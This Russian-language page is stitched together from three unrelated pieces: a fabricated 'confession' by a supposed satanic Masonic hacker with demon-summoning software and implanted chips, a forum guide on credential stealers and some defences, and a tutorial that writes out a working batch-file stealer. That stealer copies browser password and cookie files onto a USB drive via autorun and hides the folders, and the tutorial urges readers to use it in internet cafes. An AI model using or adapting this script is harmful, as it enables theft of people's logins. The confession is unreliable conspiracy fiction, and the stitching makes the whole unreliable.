Что такое "стиллер" и как защитить себя от него.

Здравствуйте. Я хочу рассказать вам мою историю, пока могу это сделать. Я утверждаю, что в течении последних четырех лет, был членом хакерской организации сатанинского толка, состоящей при масонской организации, «Орден сиреневого дракона».

Меня завербовали в нее в конце 2010 года. Я тогда учился в институте и увлекался написанием троянов на Delphi. Мне тогда пришел e-mail от одного чела, который написал что он нашел одну из моих программ и по достоинству ее оценил и предложил встретится. В общем, мы встретились, разговорились и он сказал что собирает группу хакеров и предложил мне вступить. Представился масоном, из российской ложи, как он сказал. Обещал зарплату в 50 000 рублей. Я согласился не раздумывая.

Наша группа, называлась «Преторианская стража». Набор людей в нее производился по следующим требованиям: увлечение тяжелым роком, тяжелыми наркотиками, видеоиграми, фантастической или эзотерической литературой. Курировал нашу группу, «Орден сиреневого дракона», к которому принадлежал и наш руководитель, тот самый что меня завербовал. Имя его раскрывать не стану, так как оно вам все равно ничего не скажет - назову лишь его никнейм: Хастур, так мы его все звали. Ему было где-то между 30 и 40, нам всем было 20 с хвостиком.

Наши обязанности, были весьма разнообразны. Например, мы создавали и поддерживали сайты с разной порнографией, детской, зоофильской, копрофильской. Также, мы занимались и ЛГБТ-сайтами.

Кроме того, мы писали и распространяли вирусы. Также, мы создавали ботнеты, для работы со штрих-кодами и RFID-чипами. Кстати, там действительно есть код 666 - говорю вам как специалист. Не могу, не вспомнить, операцию «Маджестик-13», когда мы взломали учасника научного форума astronomy.ru/forum, целью этой операции, было внедрение в среду серьезных специалистов, идеи о существовании правительственного заговора по сокрытию инопланетян. Это была не операция, а просто песня.

Но и это еще не все. Сейчас я расскажу вам о таком, что вы наверняка сочтете бредом, но это действительно реальность. Дело в том, что магические обряды - это последовательность определенных действий. И в принципе, возможно записать обряд черной магии (а другой впрочем, и не существует), в виде компьютерной программы. Перед нами поставили именно такую задачу - и мы ее выполнили. Не хочу вас пугать, но нами была написана (кстати, на Delphi), программа-эмулятор вызова демонов из Ада.

Нам как раз спустили задание: разработать операцию на 2015 год. После массового внедрения карт УЭК, мы планировали взлом правительственных серверов, кражу биометрических данных граждан и переправку их за рубеж. У нашего руководства, «Ордена сиреневого дракона», были свои люди в госструктурах, так что все должно было пройдти гладко. Как вдруг, произошло событие, перевернувшее всю мою жизнь.

Один из моих коллег, предложил мне новую убойную дрянь из Голландии. Я попробовал ее…. и улетел в Ад. В самом прямом смысле, я вдруг очутился в аду, я видел чудовищных демонов, грешников, испытывающих невыразимые муки, драконов величиной с грузовик, огромных исполинов запертых в клетки, настолько узкие, что они не могли даже повернуться и были вынуждены стоять. Я видел блудниц, нагие они были вынуждены делать минеты и куннилингусы чертям и чертовкам. Я смотрел на это, а злобный голос шептал мне в ухо, похихикивая: смотри, смотри! Все это ждет тебя!

Очнулся я в мокром поту. Я вдруг понял, о гибельности моего пути, о разрушительной сути сатанизма, о том что все мои увлечения - пагуба для души. Я - проклятый и назад мне пути уже нет. Мне под кожу, в свое время был вживлен чип, так что не знаю, могу ли я еще считаться человеком. Сейчас я пишу эти строки и чувствую, как мне явственно хочется попить крови. Но все же постараюсь хоть как-то сгладить свою вину, рассказав вам все это.

Знайте - масонский заговор существует. Как и психотронные компьютерные вирусы (я сам их писал своими руками) и пластиковые карты смерти и прочее. За этот пост, меня не пощадят, у нас в группе очень популярны самоубийства, это естественный финал любого сатаниста. Когда вы будете читать это, меня наверняка уже будут искать и скоро найдут, прощайте.

Что же это такое ​

Стилер, пользуясь наивностью чукотских программистов, залазит в хранилища часто используемых программ и нагло тырит оттуда все логины, пароли и т.п. Следующий, он же последний этап работы программ данного класса - отправка вкусняшек злоумышленнику. Вот как-то так всё это и работает.

Из всего вышеописанного следует один громадный минус подобного софта: если пароли не сохранены, то парнишке-злодею стилер ничего не отправит.

Теперь о основных фичах стилеров. Чаще всего эти троянчеги воруют сохраненные пароли из браузеров (акки, банки и т.п.), FTP-клиентов и IM-клиентов (шестизнаки и т.п.). Отправка паролей может происходить в открытую - т.е. уже расшифрованные голые пароли передаются на гейт или еще куда, или же в зашифрованном виде. В идеале - в таком виде, чтобы никто кроме нашего парнишки не смог бы добраться до украденных паролей.
Логи (ну т.е. сразу пачка паролей от пользователя) в большинстве случаев отправляются злодею на FTP-сервер, на гейт или на почту.

Основные методы борьбы за сохранность наших паролей. ​

Спойлер: 1.Советы от КО.

• В принципе не сохранять пароли в браузере,FTP, и прочем подобном.
• Всё записывать в блокнотик(не на компе, а такой, бумажный, с листочками))
• Юзать не распространённые браузеры.
• Делать ВТ, даже если на сайте уже лежит отчёт.

Спойлер: 2. Смена путей хранения пассов для браузеров

Как мы знаем пароли в браузерах хранятся в спец. файлов ​

XP -
C:\Documents and Settings\Username\Local Settings\Application dat\Google\Chrome\User dat\Default
в файле “Web dat”

Vista -
C:\Users\Username\Appdat\Local\Google\Chrome\User dat\Default
в файле “Web dat”

Firefox:
Пассы в Firefox хранятся в файле "signons.txt" или "signons2.txt" или "signons3.txt".

Который лежит тут: \Application dat\Mozilla\Firefox\Profiles\

Opera:
\Application dat\Opera\Opera\
в файле "wand.dat"

Но как же их защитить от стиллера?
вы удивитесь как просто это сделать
вам надо только поменять имя или путь где лежат эти файлы
Для того чтоб поменять имя или путь этих фалов надо открыть настройки браузера
как это делается читаем ниже

Для Firefox
Открываем браузер
В поле для url пишем about:config и открываем
Если это ваш первый вход то браузер предупредить вас чтоб вы были осторожны
Вам откроется окно где куча настроек
На верху в поле Поиск пишем signon и даем поиск
Поиск найдет 3 файлов “signon.txt” “signon2.txt” “signon3.txt”
Два раза кликаем по этим файлом и меняем имя
Но не забудьте, если вы "signon.txt" поменяли на "pass.txt" то "signon2.txt" должны поменять на "pass2.txt"
Все после этого перезапустите браузер

ВАЖНО! Перед тем как провернуть такую фишку не забудьте удалить все пароли из файлов “signon.txt” “signon2.txt” “signon3.txt”

Для Opera

Как выше уже отметил пассы от Оперы хранятся в файле "wand.dat"
Но мы не сможем поменять имя файла, вместо этого мы поменяем место хранение файла

Открываем браузер
В поле для url пишем opera:config и открываем
тут тоже в поле поиск пишем wand.dat
в оrне появляется наш файл и путь где он лежит
нажимаем на обзор и открывается окно где лежит файл
в этом же окне копируем wand.dat а потом переходим назад директорией выше
там создаем новую папку
открываем эту папку и сохраняем файл wand.dat (все эти операции мы делаем в окне которая открылась)
И все выбираем этот файл и нажимаем "Ок"
и все файл с пассами теперь будет лежать там куда мы его скопировали
Старый файл уже можно удалять

Вот и все. Уже стиллер не сможет украсть ваши пассы. Так как мы поменяли место хранение файла

Для Chrome

В этом браузере мы несможем поменять что - то
Но это незначит что мы несможем зашитить свои пассы
Для этого есть спец. программа "Chromeplus"

Но конечно для всего есть альтернатива
Для тех кто нехочет копаться в настройках есть программа "Kasperky Password Manager"
Устанавливаем и защищаемся

Спойлер: 3.Если уже скачали и запустили

Не всё так плохо, как кажется на первый взгляд, ведь у нас есть Wireshark
На примере UFR

Нам понядобятся:

• Билд стилера. Его ловим на любом хэк-форуме, обычно его впаривают под видом неибаццо полезной тулзы или кряка.
• Wireshark ()
• Виртуалка (Oracle VirtualBox)

Запускаем билд стилера (всё на виртуалке, и никак иначе!) и контролируем Process Explorer"ом (на самый худой и короткоствольный конец - Диспетчером задач) его работу, ожидаем завершения.

Переходим в Wireshark и жмем Capture -> Stop, т.е. завершаем сниффинг. Теперь у нас есть дамп сетевой активности всей системы за то время, пока работал билд стилера. Осталось найти нужные данные.

Для начала пробуем засечь FTP-сервер, вдруг стилер именно таким образом отправляет отчет с паролями. Для фильтрации в Wireshark"е есть всё необходимое - вбиваем в поле фильтрации (оно находится прямо над списком пойманных пакетов) слово "ftp" и жмем "Enter":

Мы получили список пакетов, отправленных по FTP:

На картинке обозначены хост, логин и пароль от FTP. Негодяй-впариватель попался, время отрывать ему яйца.
Если же ничего такого в окне сниффера не просматривается, значит на FTP логи не идут (еще это может значить, что в стилере включены анти-фичи вроде Anti-Wireshark, но об этом позже).
Попробуем словить адрес гейта. Убираем "ftp" из строки фильтрации и ищем по пакетам следы стилера. Жмем Ctrl+F для открытия окна поиска. Выбираем поиск строк (Find by: String) и вбиваем в поле поиска строку "UFR", остальное оставляем по дефолту, и ищем. Если билд отправляет пароли на гейт, что-то должно было найтись, вкусный пакет вот такого вида:

Если же сниффинг ничего не дал, значит в стилере включена защита от подобной хуиты. Можно попробовать сменить имя EXE"шника вайршарка, или изменить заголовок окна, но не факт что поможет.

И да, не надеемся на ваш антивирус, зловред легко криптануть(ну если его не школьник делал, то он обязательно закриптован)
И если вы уверены что стиллер прикреплён к рабочей проге(которая вам просто необходима и нигде её больше не взять), то запускайте просто прогу на виртуалке или в песочнице(SandBoxie).

От меня тут мало, просто собрал всю инфу что нашёл, и которая реально помогает.
Если что-то забыл, говорите, добавлю.

Сегодня мы поговорим о том, как создать стиллер паролей для браузеров, которые работают под операционной системой Windows. Он будет работать быстро и точно, а самое главное, что на него не будут ругаться антивирусы. Писать стиллер паролей мы будет в обычном блокноте, в конце сохраним его как.bat. У нас уже есть статья, где мы говорили о создании шуточных вирусов – .

Стиллер паролей – определенный класс вирусов, функционал которых состоит в том, чтобы украсть сохраненные пароли с компьютера и отправить их “автору”.

Метод, который мы будем использовать имеет как плюсы, так и минусы, без этого никуда.

• Не ругается антивирус;
• Скорость работы;
• Простота в доработке;
• Возможность мгновенного запуска;
• Портативность.

• Autorun не работает на Windows 8+;
• Постоянное создание\удаление autorun.inf;
• Личное присутствие;
• Только для Windows.

Стиллер паролей для браузеров на Windows | Разбор плюсов и минусов

Давайте разберемся, почему такие плюсы и минусы имеет наш стиллер паролей для браузеров.

Думаю первые пару пунктов в разборе не нуждаются, а вот простота в доработке, давайте посмотрим почему.

Ниже будет код программы, там видно, что стиллер крадет пароли из 3 браузеров, Opera, Mozilla, Chrome. Если вы захотите сделать его более объемным и добавить все браузеры, то вам нужно просто найти их директории и прописать пути.

Далее мгновенный запуск. Создаём файл autorun.inf и добавляем наш anyname.bat туда. Как только вы вставите флешку в ПК, произойдёт кража и её можно сразу вытаскивать. Это займет у секунду времени, однако тут сразу и минус. Autorun.inf не запускается на Windows 8+, так что придётся запускать батник вручную. Точнее сказать, автоматический запуск стал невозможен с последнего обновления безопасности Windows 7.

Постоянное создание\удаление autorun.inf – если вы вставите флешку в ПК, а потом пойдёте домой и у вас Windows 8.1 или ниже, то пароли обновятся из-за авторана. Чтобы этого избежать его нужно постоянно удалять, однако в нашем скрипте уже всё есть. Он будет удален автоматически после запуска.

Создаём стиллер паролей для браузеров

Для того, чтобы создать портативный стиллер паролей для браузеров нам понадобится только блокнот.

Создаём текстовый документ и пишем туда следующий код:

@echo off
md %~d0\Mozilla
md %~d0\Opera
md %~d0\Google
CD/D %APPDATA%\Opera\Opera\
copy /y wand.dat %~d0\Opera\
copy /y coockies.dat %~d0\Opera\
cd %AppData%\Mozilla\Firefox\Profiles*.def-ault
copy /y coockies.sqlite %~d0\Mozilla
copy /y key3.db %~d0\Mozilla
copy /y signons.sqlite %~d0\Mozilla
copy /y AppData%\Mozilla\Firefox\Profiles*.def-ault %~d0\Mozilla
cd %localappdata%\Google\Chrome\User Data\Default
copy /y “%localappdata%\Google\Chrome\User Data\Default\Login Data” “%~d0/Google”
ATTRIB -R -A -S -H
attrib +h %~d0\Mozilla
attrib +h %~d0\Opera
attrib +h %~d0\Google
del: Autorun.inf

Вы же можете его просто скопировать, сохраняем файл как anyname.bat. В коде видно, что сохраняются пароли из Mozilla, Opera, Chrome. Если вы хотите добавить ещё браузеры, требуется найти их директории и таким же образом добавить. Атрибуты, которые мы присвоили делают созданные папки скрытыми, чтобы никто ничего не заподозрил.

Теперь нужно создать файл autorun.inf со следующей командой:

Open=”anyname.bat”

Готово, теперь можете идти куда душа пожелает и воровать пароли, например в интернет-кафе или тому подобные места. Наш стиллер паролей для браузеров не является удалённым, из-за чего придётся ходить.

Открыть сохраненные пароли можно заменив краденые файлы cookies, базы данных и данные логина. Для удобства можно воспользоваться программой Password Web Views.

Сегодня мы поговорили о том, как создать стиллер паролей для браузеров, обсудили плюсы и минусы такого скрипта. Если вам понравилась статья, подписывайтесь на обновления сайта, а также наш